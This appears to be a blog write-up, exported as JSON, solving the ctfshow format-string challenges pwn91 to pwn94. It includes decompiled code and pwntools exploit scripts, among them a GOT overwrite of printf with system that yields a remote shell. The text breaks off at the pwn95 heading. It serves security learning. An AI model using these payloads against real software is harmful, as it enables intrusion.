{"id":864,"date":"2026-01-27T17:42:04","date_gmt":"2026-01-27T09:42:04","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=864"},"modified":"2026-02-05T17:01:27","modified_gmt":"2026-02-05T09:01:27","slug":"ctfshowpwn%e5%85%a5%e9%97%a8pwn91pwn%ef%bc%88%e6%9b%b4%e6%96%b0%e4%b8%ad%ef%bc%89","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2026\/01\/27\/ctfshowpwn%e5%85%a5%e9%97%a8pwn91pwn%ef%bc%88%e6%9b%b4%e6%96%b0%e4%b8%ad%ef%bc%89\/","title":{"rendered":"ctfshow:\u683c\u5f0f\u5316\u5b57\u7b26\u4e32pwn91~pwn100"},"content":{"rendered":"\n

1\u3001pwn91<\/h1>\n\n\n\n

\u524d\u8a00<\/h3>\n\n\n\n

\u4e4b\u524d\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6ca1\u6709\u5b66\u597d\uff0c\u73b0\u5728\u6765\u91cd\u65b0\u5b66\u4e00\u5b66<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

32\u4f4d\u5f00\u4e86Canary\u548cNX<\/p>\n\n\n\n

\u8fd0\u884c\u4e00\u4e0b<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6709\u4e00\u4e2a\u8f93\u5165\uff0c\u7136\u540e\u4f1a\u8f93\u51fa\u4e00\u4e2adaniu\uff0c\u53bb\u770b\u770b\u4ee3\u7801<\/p>\n\n\n\n

main\u51fd\u6570\uff1a<\/p>\n\n\n\n

unsigned int ctfshow()
{
char s[80]; \/\/ [esp+Ch] [ebp-5Ch] BYREF
unsigned int v2; \/\/ [esp+5Ch] [ebp-Ch]

\/\/v2\u53ef\u80fd\u662fcanary
v2 = __readgsdword(0x14u);
memset(s, 0, sizeof(s));
\/\/\u4e0b\u9762\u7684\u8f93\u5165\u5e76\u4e0d\u4f1a\u9020\u6210\u6808\u6ea2\u51fa
read(0, s, 0x50u);
\/\/\u6f0f\u6d1e\u5c31\u5728\u4e0b\u65b9\uff0c\u6b64\u65f6\u7684s\u662f\u53ef\u4ee5\u63a7\u5236\u7684
printf(s);
printf(“daniu now is :%d!\\n”, daniu);
return __readgsdword(0x14u) ^ v2;
}


\u6211\u4eec\u9700\u8981\u770b\u770bctfshow\u51fd\u6570\u5177\u4f53\u6709\u4ec0\u4e48\u529f\u80fd\uff1a<\/p>\n\n\n\n

unsigned int ctfshow()\n{\n  char s[80]; \/\/ [esp+Ch] [ebp-5Ch] BYREF\n  unsigned int v2; \/\/ [esp+5Ch] [ebp-Ch]\n\n  \/\/v2\u53ef\u80fd\u662fcanary\n  v2 = __readgsdword(0x14u);\n  memset(s, 0, sizeof(s));\n  \/\/\u4e0b\u9762\u7684\u8f93\u5165\u5e76\u4e0d\u4f1a\u9020\u6210\u6808\u6ea2\u51fa\n  read(0, s, 0x50u);\n  \/\/\u6f0f\u6d1e\u5c31\u5728\u4e0b\u65b9\uff0c\u6b64\u65f6\u7684s\u662f\u53ef\u4ee5\u63a7\u5236\u7684\n  printf(s);\n  printf(\"daniu now is :%d!\\n\", daniu);\n  return __readgsdword(0x14u) ^ v2;\n}<\/code><\/pre>\n\n\n\n
\u56e0\u4e3aprintf\u4f1a\u4ece\u6808\u4e0a\u8bfb\u53d6\u8981\u8f93\u51fa\u7684\u5185\u5bb9\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u63a7\u5236format string\u8ba9\u5b83\u8f93\u51fa\u7279\u5b9a\u4f4d\u7f6e\u7684\u4e1c\u897f<\/p>\n\n\n\n
\u5e38\u89c1\u7684\u6f0f\u6d1e\uff1a<\/h3>\n\n\n\n
printf(user_input);       \/\/ \u274c \u76f4\u63a5\u628a\u7528\u6237\u8f93\u5165\u4f5c\u4e3a format string\nprintf(buf);              \/\/ \u274c buf \u4e2d\u5185\u5bb9\u5b8c\u5168\u53ef\u63a7\nfprintf(stderr, buf);     \/\/ \u274c \u540c\u7406\nsnprintf(dst, n, buf);    \/\/ \u274c \u683c\u5f0f\u5316\u76ee\u6807\u653b\u51fb\n<\/code><\/pre>\n\n\n\n
\u683c\u4e32\u6f0f\u6d1e\u7684\u5229\u7528\uff1a<\/h3>\n\n\n\n
\u4efb\u610f\u8bfb<\/h4>\n\n\n\n
%x<\/code> \/ %p<\/code> \u6cc4\u9732\u6808\u4fe1\u606f<\/h5>\n\n\n\n
\u8f93\u5165\uff1a<\/p>\n\n\n\n
AAAA %p %p %p %p<\/code><\/pre>\n\n\n\n
printf \u4f1a\u628a\u67d0\u4e9b\u6808\u5185\u5bb9\u6cc4\u9732\u51fa\u6765\uff0c\u53ef\u4ee5\u627e\u5230 libc \u5730\u5740\u3001canary\u3001\u8fd4\u56de\u5730\u5740\u7b49\u3002<\/p>\n\n\n\n
\u4efb\u610f\u5730\u5740\u8bfb\uff08\u6700\u5e38\u7528\uff09<\/h5>\n\n\n\n
\u6211\u4eec\u53ef\u4ee5\u8ba9 printf \u628a\u67d0\u4e2a\u5730\u5740\u5f53\u4f5c\u5b57\u7b26\u4e32\u6307\u9488\uff1a<\/p>\n\n\n\n
printf(\"%s\", some_address);<\/code><\/pre>\n\n\n\n

\u5982\u679c format string \u53ef\u63a7\uff0c\u53ef\u4ee5\u5199\u6210\uff1a<\/p>\n\n\n\n
AAAA %7$s BBBB<\/code><\/pre>\n\n\n\n

\u5e76\u4e14\u5728\u53c2\u6570\u4f4d\u7f6e\u653e\u5165\u4f60\u60f3\u8bfb\u7684\u5730\u5740\uff1a<\/p>\n\n\n\n
payload = b\"A\" * offset + p64(target_addr)<\/code><\/pre>\n\n\n\n
\u4efb\u610f\u5199\uff08\u6838\u5fc3\uff1a%n \/ %hn \/ %hhn\uff09<\/h4>\n\n\n\n
\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u5229\u7528\u6700\u6838\u5fc3\u7684\u80fd\u529b\u662f\uff1a<\/p>\n\n\n\n
%n   \u628a\u5df2\u7ecf\u6253\u5370\u7684\u5b57\u8282\u6570\u5199\u5230\u6307\u5b9a\u5730\u5740\uff08int\uff09\n%hn  2 \u5b57\u8282\n%hhn 1 \u5b57\u8282\uff08\u7cbe\u786e\u63a7\u5236\uff09<\/code><\/pre>\n\n\n\n

\u6bd4\u5982\u8bf4\uff1a<\/p>\n\n\n\n
printf(\"123456%n\", &x);<\/code><\/pre>\n\n\n\n

\u6267\u884c\u540e\uff1a<\/p>\n\n\n\n
x = 6<\/code><\/pre>\n\n\n\n
\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n\n\n\n
    \n
  1. \u628a\u76ee\u6807\u5730\u5740\uff08\u5982 GOT \u8868\u9879\uff09\u5199\u5230\u6808\u4e0a\u53ef\u88ab\u8bbf\u95ee\u7684\u4f4d\u7f6e\uff08\u5982\u7b2c 7 \u4e2a\u53c2\u6570\uff09<\/li>\n\n\n\n
  2. \u6784\u9020\u683c\u5f0f\u4e32\u8c03\u7528 %n \u5f80\u90a3\u5730\u5740\u5199\u6570\u636e<\/li>\n<\/ol>\n\n\n\n
    \u7ee7\u7eedpwn91<\/h3>\n\n\n\n
    \u6700\u540e\u8ba9daniu == 6<\/p>\n\n\n\n
    danniu\u5728\u8fd9\u4e2a\u4f4d\u7f6e\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    danniu=0x804B038<\/p>\n\n\n\n
    \u6211\u4eec\u5148\u5229\u7528\u4efb\u610f\u8bfb\u770b\u770b\u504f\u79fb\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u6570\u4e00\u4e0b\u662f\u5728\u7b2c7\u4e2a\u4f4d\u7f6e\uff0c\u5c31\u662f\u6570\u662f\u7b2c\u51e0\u4e2a\u5730\u5740<\/p>\n\n\n\n
    \u4e5f\u53ef\u4ee5\u7528\u4efb\u610f\u8bfb\u9a8c\u8bc1\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u6709\u70b9\u751f\u758f\u5462\uff0c\u7528\u719f\u6089\u5c31\u597d\u5566\uff0c\u9a8c\u8bc1\u6210\u529f\uff0c\u504f\u79fb\u662f7<\/p>\n\n\n\n
    \u6211\u4eec\u73b0\u5728\u9700\u8981\u5411\u6709\u5730\u5740\u7684\u5730\u65b9\u5199\u5165\u516d\uff0c\u76ee\u524d\u770b\u5230\u7684\u662f\u624b\u6413\u548c\u5229\u7528\u7528pwntools\u6a21\u5757\u4e2d\u7684fmtstr\u6a21\u5757\u76f4\u63a5\u8fdb\u884c\u6539\u5199<\/p>\n\n\n\n
    \u5148\u6765\u624b\u6413\u5427\uff1a<\/h3>\n\n\n\n
    32\u4f4d\u7684\u5730\u5740\u662f4\u5b57\u8282\uff0c\u5728\u504f\u79fb\u4e3a7\u7684\u4f4d\u7f6e\u5730\u5740\u67094\u4f4d\uff0c\u53ef\u4ee5\u7528\u4efb\u610f\u5199\uff08%7$n\uff09\uff0c\u628a\u8fd9\u4e2a\u4f4d\u7f6e\u7684\u5730\u5740\u957f\u5ea6\u5199\u5165\u7136\u540e\u52a0\u4e0a2\u4e2a\u5b57\u8282\u5c31\u662f\u516d\u4e2a\u5b57\u8282\uff0c\u53ef\u4ee5\u5199\u6210’aa%7$n’\u6216’%2c%7$n’<\/p>\n\n\n\n
    \u8bd5\u4e00\u8bd5\uff1a<\/p>\n\n\n\n
    from pwn import *\ncontext.log_level=\"debug\"\np=remote(\"pwn.challenge.ctf.show\",28217)\n\npayload=p32(0x804B038)+b'aa%7$n'\np.sendline(payload)\np.interactive()\n<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u8bd5\u8bd5fmtstr\u6a21\u5757<\/h3>\n\n\n\n
    \u8fd9\u4e2a\u6a21\u5757\u4e4b\u524d\u7528\u6765\u6539\u8fc7\u5730\u5740\uff0c\u4f46\u662f\u6709\u4e9b\u5fd8\u4e86\uff0c\u9700\u8981\u770b\u770b\u53c2\u6570\uff1a<\/p>\n\n\n\n
    fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')\n<\/code><\/pre>\n\n\n\n
    writes<\/code>\uff08\u6307\u5b9a\u4f60\u8981\u5199\u54ea\u4e9b\u5730\u5740 + \u5199\u4ec0\u4e48\uff09 \u6bd4\u5982 0x601028: 0xdeadbeef<\/p>\n\n\n\n
    numbwritten\u662f\u5df2\u7ecf\u6253\u5370\u4e86\u591a\u5c11\u5b57\u7b26\uff0c\u9ed8\u8ba4\u662f0<\/p>\n\n\n\n
    write_size<\/code>\uff08\u6307\u5b9a\u5199\u5165\u7c92\u5ea6\uff1abyte\/short\/int\uff09 short\u6ce8\u610f\u662f2\u5b57\u8282<\/p>\n\n\n\n
    \u6b27\u514b\u8fd9\u9053\u9898\u5c31\u8be5\u5199\u6210<\/p>\n\n\n\n
    fmtstr_payload(7,{0x804B038:6})<\/code><\/pre>\n\n\n\n

    ok,\u8bd5\u4e00\u8bd5\uff1a
    <\/p>\n\n\n\n
    from pwn import *\ncontext.log_level=\"debug\"\np=remote(\"pwn.challenge.ctf.show\",28217)\n\n#payload=p32(0x804B038)+b'aa%7$n'\npayload=fmtstr_payload(7,{0x804B038:6})\np.sendline(payload)\np.interactive()<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    2\u3001pwn92<\/h1>\n\n\n\n
    \u53ef\u80fd\u4e0a\u4e00\u9898\u6ca1\u592a\u770b\u61c2\uff1f\u6765\u770b\u4e0b\u57fa\u7840\u5427<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    checskec:<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    64\u4f4dgot\u8868\u4e0d\u53ef\u6539\uff0c\u5f00\u4e86canary\u548cnx\u8fd8\u6709\u5730\u5740\u968f\u673a\u5316<\/p>\n\n\n\n
    \u6211\u4eec\u8fd0\u884c\u4e00\u4e0b\u770b\u770b\uff1a<\/p>\n\n\n\n
    faetong@faetong-virtual-machine:~\/pwnit$ .\/pwn92\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Format_String                                           \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Look at the difference !                                \n    * *************************************                           \nHere is some example:\nHello CTFshow %\nHello CTFshow!\nNum : 114514\nFormat Strings\n           A\n           Hello\n           A\n          Hello!\nStrings Format\n                                         \ufffd\n\/ctfshow_flag: No such file or directory.\n<\/code><\/pre>\n\n\n\n
    \u597d\u50cf\u5c31\u662f\u4e00\u6bb5\u6f14\u793a\uff0c\u8f93\u51fa\u4e86\u5f88\u591a\u79cd\u5b57\u7b26\u4e32\uff0c\u4e00\u4f1a\u513fnc\u4e00\u4e0b\u5c31\u6709flag\u4e86<\/p>\n\n\n\n
    \u5148\u6765\u770b\u770b\u600e\u4e48\u56de\u4e8b\uff0c\u5206\u6790\u4e00\u4e0b \u4ee3\u7801\uff1a<\/p>\n\n\n\n
    main\u51fd\u6570\uff1a<\/p>\n\n\n\n
    int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  init(argc, argv, envp);\n  logo();\n  puts(\"Here is some example:\");\n  \/\/\u5c55\u793a\u4e00\u4e9b\u4f8b\u5b50\n  example();\n  flagishere();\n  return 0;\n}<\/code><\/pre>\n\n\n\n

    example\uff1a<\/p>\n\n\n\n
    unsigned __int64 example()\n{\n  int v1; \/\/ [rsp+4h] [rbp-Ch] BYREF\n  unsigned __int64 v2; \/\/ [rsp+8h] [rbp-8h]\n\n  \/\/v2\u5e94\u8be5\u662fcanary\n  v2 = __readfsqword(0x28u);\n  \n  \/\/%% \u2192 \u8f93\u51fa\u4e00\u4e2a\u5b57\u9762\u91cf %\n  \/\/\u8f93\u51fa\uff1aHello CTFshow %\n  printf(\"Hello CTFshow %%\\n\");\n  \n  \/\/puts\u4f1a\u81ea\u52a8\u6dfb\u52a0\\n\n  puts(\"Hello CTFshow!\");\n  \n  \/\/\u6574\u6570\n  printf(\"Num : %d\\n\", 114514);\n  \n  \/\/%s \u6309\u7167\u987a\u5e8f\u8bfb\u53d6\u4e24\u4e2a\u53c2\u6570\n  \/\/\u8f93\u51fa\uff1aFormat Strings\n  printf(\"%s %s\\n\", \"Format\", \"Strings\");\n  \n  \/\/%c \u6253\u5370\u4e00\u4e2a\u5b57\u7b26\n  \/\/65 = ASCII \u2018A\u2019\n  \/\/%12c \u8868\u793a\u5bbd\u5ea6\u4e3a 12 \u2192 \u5de6\u8fb9\u8865\u7a7a\u683c\n  printf(\"%12c\\n\", 65);\n\n  \/\/\u540c\u7406\u6362\u6210\u4e86\u5b57\u7b26\u4e32\n  printf(\"%16s\\n\", \"Hello\");\n\n  \/\/\u5148\u6253\u5370 \u5bbd\u5ea6\u4e3a 12 \u7684 'A' \u2192 \u6253\u5370 12 \u5b57\u8282\n  \/\/%n \u4f1a\u628a \u5f53\u524d\u5df2\u8f93\u51fa\u7684\u5b57\u7b26\u6570\u5199\u5165 v1\n  \/\/\u7136\u540e\u518d\u6253\u5370\u4e00\u4e2a \\n\n  printf(\"%12c%n\\n\", 65, &v1);\n\n  \/\/\u540c\u7406\u4e0a\u9762\u6362\u6210\u5b57\u7b26\u4e32\n  printf(\"%16s%n\\n\", \"Hello!\", &v1);\n\n  \/\/\u4f4d\u7f6e\u53c2\u6570\n  \/\/%1$s \u2192 \u7b2c\u4e00\u4e2a\u53c2\u6570 \u2192 \"Format\"\n  \/\/%2$s \u2192 \u7b2c\u4e8c\u4e2a\u53c2\u6570 \u2192 \"Strings\"\n  \/\/\u5b9e\u9645\u8f93\u51fa\u662f\u628a\u4e24\u4e2a\u53c2\u6570\u987a\u5e8f\u53cd\u8fc7\u6765\n  printf(\"%2$s %1$s\\n\", \"Format\", \"Strings\");\n\n  \/\/%42c  \u2192 \u6253\u5370 42 \u5b57\u8282\uff08\u7a7a\u683c + \u4e00\u4e2a\u5b57\u7b26\uff1f\uff09\n  \/\/%1$n \u2192 \u5411\u7b2c 1 \u4e2a\u53c2\u6570\u6307\u5411\u7684\u5730\u5740\u5199\u5165\u201c\u5df2\u7ecf\u6253\u5370\u7684\u5b57\u8282\u6570\u201d\n  printf(\"%42c%1$n\\n\", &v1);\n  \n  return __readfsqword(0x28u) ^ v2;\n}<\/code><\/pre>\n\n\n\n

    \u63a5\u4e0b\u6765\u662fflagishere\u51fd\u6570\uff1a<\/p>\n\n\n\n
    unsigned __int64 flagishere()\n{\n  FILE *stream; \/\/ [rsp+8h] [rbp-68h]\n  char format[10]; \/\/ [rsp+16h] [rbp-5Ah] BYREF\n  char s[72]; \/\/ [rsp+20h] [rbp-50h] BYREF\n  unsigned __int64 v4; \/\/ [rsp+68h] [rbp-8h]\n\n  v4 = __readfsqword(0x28u);\n\n  \/\/\u4e0b\u9762\u662f\u4e00\u4e2a\u6587\u4ef6\u64cd\u4f5c\n  stream = fopen(\"\/ctfshow_flag\", \"r\");\n  if ( !stream )\n  {\n    puts(\"\/ctfshow_flag: No such file or directory.\");\n    exit(0);\n  }\n\n  \/\/\u8bfb\u5165s\n  fgets(s, 64, stream);\n  printf(\"Enter your format string: \");\/\/\u6b64\u65f6\u6211\u4eec\u9700\u8981\u8ba9\u5b83\u4ee5\u5b57\u7b26\u4e32\u5f62\u5f0f\u8f93\u51fa\n  __isoc99_scanf(\"%9s\", format);\n  printf(\"The flag is :\");\n  printf(format, s);\n  return __readfsqword(0x28u) ^ v4;\n}<\/code><\/pre>\n\n\n\n

    \u5c31\u8f93\u5165%s\u5c31\u884c\u5566<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    3\u3001pwn93<\/h1>\n\n\n\n
    emmm\uff0c\u518d\u6765\u4e00\u9053\u57fa\u7840\u539f\u7406\uff1f<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    64\u4f4d\u5f00\u4e86canary,NX,PIE\uff0c\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u770b\u4e0d\u61c2\u82f1\u6587\uff0c\u770b\u770b\u4ee3\u7801\u5427\uff1a<\/p>\n\n\n\n
    int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int v4; \/\/ [rsp+4h] [rbp-Ch] BYREF\n  unsigned __int64 v5; \/\/ [rsp+8h] [rbp-8h]\n\n  v5 = __readfsqword(0x28u);\n  init(argc, argv, envp);\n  logo();\n  menu();\n  puts(\"Enter your choice: \");\n  __isoc99_scanf(\"%d\", &v4);\n  switch ( v4 )\n  {\n    case 1:\n      func1();\n      break;\n    case 2:\n      func2();\n      break;\n    case 3:\n      func3();\n      break;\n    case 4:\n      func4();\n      break;\n    case 5:\n      func5();\n      break;\n    case 6:\n      nothing_here();\n      break;\n    case 7:\n      exit0();\n      break;\n    default:\n      puts(\"Invalid choice. Please enter a valid option.\");\n      break;\n  }\n  return 0;\n}<\/code><\/pre>\n\n\n\n

    func1<\/p>\n\n\n\n
    .text:0000000000000A87                                   public func1\n.text:0000000000000A87                                   func1 proc near                         ; CODE XREF: main+89\u2193p\n.text:0000000000000A87                                   ; __unwind {\n.text:0000000000000A87 000 55                            push    rbp\n.text:0000000000000A88 008 48 89 E5                      mov     rbp, rsp\n.text:0000000000000A8B 008 48 8D 3D BE 08 00 00          lea     rdi, aSSSSSSSSSSSSSS            ; \"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%\"...\n.text:0000000000000A92 008 B8 00 00 00 00                mov     eax, 0\n.text:0000000000000A97 008 E8 E4 FC FF FF                call    _printf\n.text:0000000000000A97\n.text:0000000000000A9C 008 90                            nop\n.text:0000000000000A9D 008 5D                            pop     rbp\n.text:0000000000000A9E 000 C3                            retn\n.text:0000000000000A9E                                   ; } \/\/ starts at A87\n.text:0000000000000A9E\n.text:0000000000000A9E                                   func1 endp\n.text:0000000000000A9E\n.text:0000000000000A9F<\/code><\/pre>\n\n\n\n
    em…\u4f3c\u4e4e\u5c31\u662f\u5d29\u6e83\u7684\u539f\u56e0\u5462\uff0c\u53ea\u6709format\u6ca1\u6709\u53c2\u6570<\/p>\n\n\n\n
    func2<\/p>\n\n\n\n
    int __fastcall func2(__int64 a1, int a2, int a3, const void *a4, const void *a5, const void *a6)\n{\n  \/\/%08x\uff1a\u4ee5 8 \u4f4d\u5341\u516d\u8fdb\u5236 \u8f93\u51fa a2\uff0c\u4e0d\u8db3 8 \u4f4d\u65f6\u5de6\u4fa7\u8865 0\n  \/\/%07x\uff1a\u4ee5 7 \u4f4d\u5341\u516d\u8fdb\u5236 \u8f93\u51fa a3\uff0c\u4e0d\u8db3 7 \u4f4d\u65f6\u5de6\u4fa7\u8865 0\n  \/\/%p\uff1a\u4ee5 \u6307\u9488\u683c\u5f0f \u8f93\u51fa a4, a5, a6\n  return printf(\"%08x-%07x-%p-%p-%p\", a2, a3, a4, a5, a6);\n}<\/code><\/pre>\n\n\n\n

    \u53ef\u4ee5\u8fd0\u884c\u770b\u770b<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    public func3\n.text:0000000000000AB7                                   func3 proc near                         ; CODE XREF: main+A1\u2193p\n.text:0000000000000AB7                                   ; __unwind {\n.text:0000000000000AB7 000 55                            push    rbp\n.text:0000000000000AB8 008 48 89 E5                      mov     rbp, rsp\n.text:0000000000000ABB 008 48 8D 3D D6 08 00 00          lea     rdi, aAaaaPPPPPPPPPP            ; \"AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%\"...\n.text:0000000000000AC2 008 B8 00 00 00 00                mov     eax, 0\n.text:0000000000000AC7 008 E8 B4 FC FF FF                call    _printf\n.text:0000000000000AC7\n.text:0000000000000ACC 008 90                            nop\n.text:0000000000000ACD 008 5D                            pop     rbp\n.text:0000000000000ACE 000 C3                            retn\n.text:0000000000000ACE                                   ; } \/\/ starts at AB7\n.text:0000000000000ACE\n.text:0000000000000ACE                                   func3 endp<\/code><\/pre>\n\n\n\n
    \u8fd9\u4e2a\u5c31\u662f\u5229\u7528\u4efb\u610f\u8bfb\u8bfb\u53d6\u5730\u5740<\/p>\n\n\n\n
    func4<\/p>\n\n\n\n
    unsigned __int64 func4()\n{\n  int v1; \/\/ [rsp+4h] [rbp-Ch] BYREF\n  unsigned __int64 v2; \/\/ [rsp+8h] [rbp-8h]\n\n  v2 = __readfsqword(0x28u);\n\n  \/\/%0134512640d\u8f93\u51fa\u4e00\u4e2a\u6574\u6570 1\uff0c\u5bbd\u5ea6\u4e3a 134512640\u5b57\u7b26\uff0c\u4e0d\u8db3\u90e8\u5206\u7528 0\u586b\u5145\n  \/\/%n\u5f80v1\u5904\u5199\u5165134512640\n  printf(\"%0134512640d%n\\n\", 1, &v1);\n  return __readfsqword(0x28u) ^ v2;\n}<\/code><\/pre>\n\n\n\n

    func5<\/p>\n\n\n\n
    unsigned __int64 func5()\n{\n  int v1; \/\/ [rsp+1h] [rbp-2Fh] BYREF\n  __int64 v2; \/\/ [rsp+8h] [rbp-28h] BYREF\n  __int64 v3; \/\/ [rsp+10h] [rbp-20h] BYREF\n  char Hello_CTFshow[14]; \/\/ [rsp+1Ah] [rbp-16h] BYREF\n  unsigned __int64 v5; \/\/ [rsp+28h] [rbp-8h]\n\n  v5 = __readfsqword(0x28u);\n  strcpy(Hello_CTFshow, \"Hello CTFshow\");\n\n  \/\/%hhn\uff1a\u5c06 printf \u8f93\u51fa\u7684\u5b57\u7b26\u6570\u91cf\uff08\u5b57\u7b26\u6570\uff09\u5199\u5165 *(unsigned char *)(&v1)\n  \/\/\u4e5f\u5c31\u662f\u8bf4\u53ea\u5199\u5165 v1 \u53d8\u91cf\u7684\u4e00\u4e2a\u5b57\u8282\u3002\n  printf(\"%s %hhn\\n\", Hello_CTFshow, &v1);\n\n  \/\/%hn\uff1a\u5c06\u8f93\u51fa\u5b57\u7b26\u6570\u91cf\u5199\u5165 *(unsigned short *)(&v1 + 1\u5b57\u8282)\n  \/\/\u5199\u5165 v1 \u7684\u4e2d\u95f4\u4e24\u4e2a\u5b57\u8282\u3002\n  printf(\"%s %hn\\n\", Hello_CTFshow, (int *)((char *)&v1 + 1));\n\n  \/\/%n\uff1a\u5199\u5165\u4e00\u4e2a 4 \u5b57\u8282 int\n  \/\/\u76ee\u6807\u5730\u5740\u662f v1 \u7684 (char*)&v1 + 3 \u4f4d\u7f6e\n  \/\/\u8fd9\u4f1a\u8986\u76d6 v1 \u672b\u5c3e 1 \u5b57\u8282 + \u6ea2\u51fa\u5230\u540e\u9762\u7684\u6808\u53d8\u91cf\uff01\u5177\u6709\u5371\u9669\u6027\u3002\n  printf(\"%s %n\\n\", Hello_CTFshow, (int *)((char *)&v1 + 3));\n\n  \/\/%ln\uff1a\u5199\u5165 long\uff088\u5b57\u8282\uff09\u5199\u5165\u5230 v2\n  printf(\"%s %ln\\n\", Hello_CTFshow, &v2);\n\n  \/\/%lln\uff1a\u5199\u5165 long long\uff088\u5b57\u8282\uff09\u5199\u5165\u5230 v3\n  printf(\"%s %lln\\n\", Hello_CTFshow, &v3);\n  return __readfsqword(0x28u) ^ v5;\n}<\/code><\/pre>\n\n\n\n

    \u53ef\u4ee5\u8fd0\u884c\u4e00\u4e0b\u770b\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    exit0:<\/p>\n\n\n\n
    unsigned __int64 exit0()\n{\n  FILE *stream; \/\/ [rsp+8h] [rbp-58h]\n  char s[72]; \/\/ [rsp+10h] [rbp-50h] BYREF\n  unsigned __int64 v3; \/\/ [rsp+58h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  stream = fopen(\"\/ctfshow_flag\", \"r\");\n  if ( !stream )\n  {\n    puts(\"\/ctfshow_flag: No such file or directory.\");\n    exit(0);\n  }\n  fgets(s, 64, stream);\n  printf(\"%s\", s);\n  return __readfsqword(0x28u) ^ v3;\n}<\/code><\/pre>\n\n\n\n

    \u5c31\u662fnc\u62ffflag\u5566<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    4\u3001pwn94<\/h1>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    32\u4f4d\u5f00\u4e86NX<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u5f88\u660e\u663e\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e<\/p>\n\n\n\n
    \u8fd9\u9053\u9898\u5176\u5b9e\u5c31\u7528\u524d\u9762\u7684fmtstr\u6a21\u5757\u628aprintf_got\u6539\u4e3asystem_plt\u5c31\u53ef\u4ee5\u5b9e\u73b0\u5728\u6267\u884cprintf\uff08\uff09\u65f6\u8c03\u7528system\uff0c\u6211\u4eec\u53d1\u9001\u53c2\u6570’\/bin\/sh\\x00’\u540e\u5c31\u53ef\u4ee5getshell\u4e86<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u504f\u79fb\u91cf\u662f6<\/p>\n\n\n\n
    from pwn import*\ncontext.log_level='debug'\n#p=process(\".\/pwn94\")\np=remote(\"pwn.challenge.ctf.show\",28180)\nelf=ELF(\".\/pwn94\")\nprintf_got=elf.got['printf']\nsys_plt=elf.plt['system']\n\npayload=fmtstr_payload(6,{printf_got:sys_plt})\np.sendline(payload)\np.recv()\np.sendline(b'\/bin\/sh\\x00')\np.interactive()\n~                           <\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    5\u3001pwn95\uff08\u52a0\u5927\u4e86\u4e00\u70b9\u70b9\u96be\u5ea6\uff0c\u4e0d\u8fc7\u5bf9\u4f60\u6765\u8bf4\u8fd8\u662fso easy \u5427\uff09<\/h1>\n\n\n\n
